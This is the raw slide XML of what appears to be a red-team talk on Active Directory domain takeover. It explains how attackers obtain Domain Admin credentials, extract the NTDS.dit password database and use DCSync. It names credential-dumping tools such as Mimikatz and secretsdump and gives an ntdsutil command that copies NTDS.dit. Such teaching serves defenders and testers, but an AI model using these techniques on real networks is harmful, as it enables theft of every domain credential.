      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3536468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Domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Ownage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265124" y="2009410"/>
            <a:ext cx="827886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does it mean to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>pwn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> the domain?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passwords?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Loot?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 to everything?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="86604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Basic Theory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89A3FD-A05A-441D-9ED4-6CA64C2C167C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="190368" y="3452047"/>
            <a:ext cx="1568685" cy="1107947"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst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201625 w 1201625"/>
              <a:gd name="connsiteY2" fmla="*/ 815868 h 815868"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 1201625"/>
              <a:gd name="connsiteY3" fmla="*/ 815868 h 815868"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 1201625"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 815868"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1201625"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 815868"/>
              <a:gd name="connsiteX1" fmla="*/ 1201625 w 1201625"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 815868"/>
              <a:gd name="connsiteX2" fmla="*/ 1190084 w 1201625"/>
              <a:gd name="connsiteY2" fmla="*/ 406674 h 815868"/>
              <a:gd name="connsiteX3" fmla="*/ 1201625 w 1201625"/>
              <a:gd name="connsiteY3" fmla="*/ 815868 h 815868"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 1201625"/>
              <a:gd name="connsiteY4" fmla="*/ 815868 h 815868"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 1201625"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 81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01625" h="815868">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1201625" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1190084" y="406674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1201625" y="815868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="815868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093262-8E80-4982-99CA-FD95821AB875}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5413189" y="1991965"/>
            <a:ext cx="1365621" cy="8717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ED07DE-35AC-43CF-AD8D-91AE67D544BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7889783" y="3460990"/>
            <a:ext cx="1604701" cy="1069606"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="635000">
              <a:schemeClr val="accent3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Access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(Spread)</a:t>
            </a:r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6C17C7D9-E648-44B8-AF1A-4B5E453B299C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5195701" y="3381316"/>
            <a:ext cx="1803163" cy="119811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 Privilege User?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DCC4F-22B3-4007-B988-F96B78D43E53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10185474" y="3460990"/>
            <a:ext cx="1604701" cy="10759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Migrate to New Host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F98EE0-EB49-48CF-846C-567C41BA793B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="8" idx="2"/>
            <a:endCxn id="84" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1743987" y="3994497"/>
            <a:ext cx="905987" cy="9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9438E6-315E-45B9-979F-9CAF3510E3A7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6096000" y="2863689"/>
            <a:ext cx="1283" cy="51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47817F-627B-4EEA-8CEB-24EA27149345}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5564472" y="3038191"/>
            <a:ext cx="531526" cy="3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F93868-6489-4B4E-9B1C-914B737078B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6998864" y="3980372"/>
            <a:ext cx="890919" cy="1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DF254D-ABC3-4773-B135-877005309EF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9494484" y="3995793"/>
            <a:ext cx="690990" cy="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CDD4850-2A2A-42EC-B80C-16DA71A6BAFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="13" idx="2"/>
            <a:endCxn id="84" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7221077" y="793246"/>
            <a:ext cx="23048" cy="7510448"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 713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9E41E15A-DBA4-427B-825B-465AA9D01BD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2649974" y="3428999"/>
            <a:ext cx="1654806" cy="113099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Credentials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A163EE3-1170-49B5-B3F3-C36908B82FDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="84" idx="3"/>
            <a:endCxn id="12" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4304780" y="3980372"/>
            <a:ext cx="890921" cy="1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F926511-1CBB-43AD-A9F1-0C159829E5F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7173785" y="3708400"/>
            <a:ext cx="58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CB6EB-49EF-4E79-A9F9-27310E2714E1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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2526448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Domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Ownage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337DF9-2C9B-43BE-A887-D4BF049461CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6024829" y="3067079"/>
            <a:ext cx="5302350" cy="36010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is important?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do they value?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Enterprise Admin?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*Nix Environments?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C675F-E3A4-49D1-9FB7-EF9626A3094F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="265124" y="2009410"/>
            <a:ext cx="827886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does it mean to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>pwn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> the domain?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passwords?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Loot?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 to everything?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1851818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Domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Ownage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4E33907-1AAC-4C21-9E04-7C3E2F4E2427}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="659419" y="2126996"/>
            <a:ext cx="9975755" cy="30890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4000" dirty="0" err="1"/>
              <a:t>Pwn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t> the Users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Identify VIP’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>?Set up long-term </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>Persistance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Gather Loot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34285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Domain Admin Credentials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265123" y="1900854"/>
            <a:ext cx="11340721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they get there?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Logging onto a computer with a Domain Admin account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1649B-BD0A-4E66-A8B3-54F6EB1BA306}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9369084" y="6550223"/>
            <a:ext cx="296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https://adsecurity.org/?p=2362</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="130749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Domain Admin Credentials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265123" y="1900854"/>
            <a:ext cx="113407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they get there?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Logging onto a computer with a Domain Admin account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Logging onto a computer with a user account and then entering Domain Admin credentials with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>RunAs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1649B-BD0A-4E66-A8B3-54F6EB1BA306}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9369084" y="6550223"/>
            <a:ext cx="296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https://adsecurity.org/?p=2362</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3116812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Domain Admin Credentials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265123" y="1900854"/>
            <a:ext cx="11340721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they get there?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Logging onto a computer with a Domain Admin account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Logging onto a computer with a user account and then entering Domain Admin credentials with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>RunAs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/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Logging onto a computer with a user account and opening an RDP session to a server by typing Domain Admin credentials into the RDP credential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1649B-BD0A-4E66-A8B3-54F6EB1BA306}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9369084" y="6550223"/>
            <a:ext cx="296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https://adsecurity.org/?p=2362</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2172253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Domain Admin Credentials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265123" y="1900854"/>
            <a:ext cx="113407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they get there?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Logging onto a computer with a Domain Admin account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Logging onto a computer with a user account and then entering Domain Admin credentials with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>RunAs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/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Logging onto a computer with a user account and opening an RDP session to a server by typing Domain Admin credentials into the RDP credential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Services deployed to all workstation or servers (or both) that run under the context of a service account with Domain Admin rights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1649B-BD0A-4E66-A8B3-54F6EB1BA306}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9369084" y="6550223"/>
            <a:ext cx="2968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https://adsecurity.org/?p=2362</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2948439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NTDS.dit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0" y="2993576"/>
            <a:ext cx="653266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457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>The Active Directory database. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>It stores all Active Directory information including</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t> password hashes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C2FC32"/>
              </a:solidFill>
            </a:endParaRPr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190D0-CDEF-4B1F-9141-B6F330A9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57" y="2762047"/>
            <a:ext cx="5924843" cy="4095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592E6-0B15-4EE8-85C9-1C5D073A0431}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1954482"/>
            <a:ext cx="114018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Clr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr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prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>On every DC -&gt; c:\windows\ntds\ntds.dit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21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Git </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NTDS.dit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58046" y="1693994"/>
            <a:ext cx="112905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domain admin user account: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Backup locations (backup server storage, media, and/or network shares)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Find the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>NTDS.dit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> file staged on member servers prior to promoting to Domain Controllers.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With admin rights to virtualization host, a virtual DC can be cloned and the associated data copied offline.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcBef>
                <a:spcPts val="12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Compromise an account with rights to logon to a Domain Controller.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Backup Operators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Account Operators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000" dirty="0"/>
              <a:t>Print Operators</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3178954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Git </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NTDS.dit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61143" y="2377174"/>
            <a:ext cx="545339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Techniques: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Mimikatz</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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Hashdump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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NTDSGRAB module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WCE - windows credential editor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secretsdump.py ~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>impacket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93381-DAF6-44D5-8BF0-667AFABFEA2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5514536" y="2644725"/>
            <a:ext cx="6553018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Volume Snapshot Service (VSS) Volume Shadow Copy  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>NTDS.dit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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NinjaCopy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/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ntdsutil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> “ac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ntds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>” “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ifm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>” “create full c:\temp” q </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>q</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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C2FC32"/>
              </a:buClr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C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DCSync</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C2FC3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542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455037" y="1772851"/>
            <a:ext cx="995666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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>DCSync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> works:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>1. Discovers Domain Controller in the specified domain name.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>2. Requests the Domain Controller replicate the user credentials via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>GetNCChanges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>(leveraging </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Directory Replication Service (DRS) Remote Protocol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What you need:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DS-Replication-Get-Changes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t> DS-Replication-Get-Changes-All</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>				*doesn’t have to be a DA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7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Initial Footholds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CB6EB-49EF-4E79-A9F9-27310E2714E1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EF697-1BC3-41F7-9758-480DA788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29" y="1635245"/>
            <a:ext cx="5954233" cy="4963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BBA30-9C4A-412C-BBD8-9F15E4D49BBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6285462" y="1841242"/>
            <a:ext cx="59542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4000" dirty="0"/>
              <a:t>Default Credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500"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4000" dirty="0"/>
              <a:t>Password Guessing / Spraying</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>VPN/Citrix/Exchange Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buCl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67979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05509" y="1723009"/>
            <a:ext cx="50080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Bloodhound -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>CollectionMethod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> ACL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Some ACE’s collected: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ForceChangePassword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AddMembers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GenericAll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GenericWrite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WriteOwner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WriteDACL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AllExtendedRights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85DD04-436C-4F3E-B65C-A42D62F89A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Bloodhound - ACL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Enum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40995-BBFF-47A8-B6AC-6A0D0A5AF7A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9981028" y="6569845"/>
            <a:ext cx="239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https://wald0.com/?p=112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86857-49F0-460F-BF3C-4959AB38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82" y="1631570"/>
            <a:ext cx="6926518" cy="466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10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365157" y="1664127"/>
            <a:ext cx="11205124" cy="1283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enables the user, with Tier 0 privileges, to imitate a Domain Controller on the network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Domain controllers continuously ‘sync’ with each other to keep track of the objects in the domain.</a:t>
            </a:r>
          </a:p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tells the network that we are an out-of-sync DC and need an up to date </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ntds.dit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p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87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365157" y="1664127"/>
            <a:ext cx="11205124" cy="1283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enables the user, with Tier 0 privileges, to imitate a Domain Controller on the network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Domain controllers continuously ‘sync’ with each other to keep track of the objects in the domain.</a:t>
            </a:r>
          </a:p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tells the network that we are an out-of-sync DC and need an up to date </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ntds.dit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p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2DA99C-AF7D-47DB-B2AF-D061AAA82986}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="27" idx="1"/>
            <a:endCxn id="31" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1483225" y="4280150"/>
            <a:ext cx="2267444" cy="30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1FB0B2-901A-42AD-9D1C-4F4B9A1F3B20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="237881" y="4778662"/>
            <a:ext cx="12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5912D-11C0-4175-B32F-68833B53FDA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2843304" y="3910818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Shell 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DFEC4-1C24-435A-85CA-43FE907D48A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3824145" y="4640162"/>
            <a:ext cx="121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Resource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5B54F70A-E64C-4013-AAC5-23E54092B135}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2062546" y="3813429"/>
            <a:ext cx="780757" cy="867844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Laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E691EBB8-6B85-4A80-B058-D26977A9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0669" y="3634349"/>
            <a:ext cx="1291601" cy="1291601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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86E9CBE1-FD5A-45CE-AA18-D8654B77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24" y="3664706"/>
            <a:ext cx="1291601" cy="129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77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365157" y="1664127"/>
            <a:ext cx="11205124" cy="1283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enables the user, with Tier 0 privileges, to imitate a Domain Controller on the network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Domain controllers continuously ‘sync’ with each other to keep track of the objects in the domain.</a:t>
            </a:r>
          </a:p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tells the network that we are an out-of-sync DC and need an up to date </a:t>
            </a:r>
            <a:r>
